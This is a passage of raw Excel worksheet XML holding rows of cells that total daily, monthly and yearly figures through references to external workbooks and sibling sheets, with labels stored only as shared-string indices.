      <c r="W26" s="209">
        <f>'[15]27'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]27'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]27'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]27'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'26'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'26'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]27'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]27'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]27'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]27'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]27'!$U$69</f>
        <v>58.8966049382716</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]27'!$V$69</f>
        <v>67.6653970452447</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]27'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]27'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]27'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'26'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'26'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]27'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]27'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]27'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]27'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]27'!$U$104</f>
        <v>35.6430555555556</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]27'!$V$104</f>
        <v>62.2231879039704</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]27'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]27'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]27'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'26'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'26'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]27'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]27'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]27'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]27'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]27'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]27'!$V$105</f>
        <v>32.3659048938135</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]27'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]27'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]27'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'26'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'26'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]27'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]27'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]27'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]27'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]27'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]27'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]27'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]27'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]27'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]27'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]27'!$E$16</f>
        <v>5405</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'26'!H31</f>
        <v>123965</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1496972</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]27'!$I$16</f>
        <v>4770.26</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'26'!K31</f>
        <v>133324.27</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1489372.4</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]27'!$L$16</f>
        <v>56070.1</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>74.7601333333333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'[11]27'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]27'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'26'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]27'!$I$13</f>
        <v>4129</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'26'!K32</f>
        <v>91310</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1112788</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]27'!$L$13</f>
        <v>48692.156</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>97.384312</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]27'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]27'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]27'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]27'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]27'!$U$76</f>
        <v>4.01234567901235e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]27'!$V$76</f>
        <v>4.1089566020314e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]27'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]27'!$R$76</f>
        <v>2.6e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]27'!$S$76</f>
        <v>3.56e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]27'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'26'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]27'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'26'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]27'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]27'!$W$77</f>
        <v>22.72</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]27'!$X$77</f>
        <v>20.58</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]27'!$Y$77</f>
        <v>19.79</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]27'!$T$77</f>
        <v>100.000000000042</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]27'!$U$77</f>
        <v>23.4922839506188</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]27'!$V$77</f>
        <v>60.1575484764557</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]27'!$Q$77</f>
        <v>24.00000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]27'!$R$77</f>
        <v>152.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]27'!$S$77</f>
        <v>5212.05000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]27'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'26'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]27'!$I$50</f>
        <v>1430.47</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'26'!K34</f>
        <v>23509.35</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>490712.28</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]27'!$L$15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'[11]27'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'26'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]27'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'26'!K35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G36+'26'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'26'!K36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G37+'26'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'26'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]27'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]27'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]27'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'26'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]27'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'26'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]27'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'26'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'26'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]27'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]27'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]27'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'26'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]27'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'26'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]27'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'26'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'26'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]27'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]27'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]27'!$R$50</f>
        <v>317.06</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'26'!U39</f>
        <v>8544.44</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>87358.039</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]27'!$V$50</f>
        <v>268</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'26'!X39</f>
        <v>8417</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>87176</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]27'!$Y$50</f>
        <v>1358.986</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'26'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'26'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]27'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]27'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]27'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]27'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]27'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]27'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]27'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]27'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]27'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]27'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]27'!$E$16</f>
        <v>2199</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'26'!H41</f>
        <v>20037</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>145013</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]27'!$I$16</f>
        <v>1101.03</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'26'!K41</f>
        <v>23794.69</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>145188.23</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]27'!$L$16</f>
        <v>22372.07</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>74.5735666666667</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]27'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]27'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]27'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'26'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]27'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'26'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]27'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]27'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]27'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'26'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]27'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'26'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]27'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]27'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]27'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]27'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'26'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]27'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'26'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]27'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]27'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]27'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'26'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]27'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'26'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]27'!$L$14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'[12]27'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'26'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]27'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'26'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]27'!$L$15</f>
        <v>52110.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]27'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]27'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]27'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'26'!U44</f>
        <v>6474.66</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>71227.828</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]27'!$V$29</f>
        <v>244</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'26'!X44</f>
        <v>4945</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>71355</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]27'!$Y$29</f>
        <v>3829.117</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]27'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'26'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]27'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'26'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]27'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]27'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]27'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]27'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]27'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]27'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]27'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]27'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]27'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'26'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
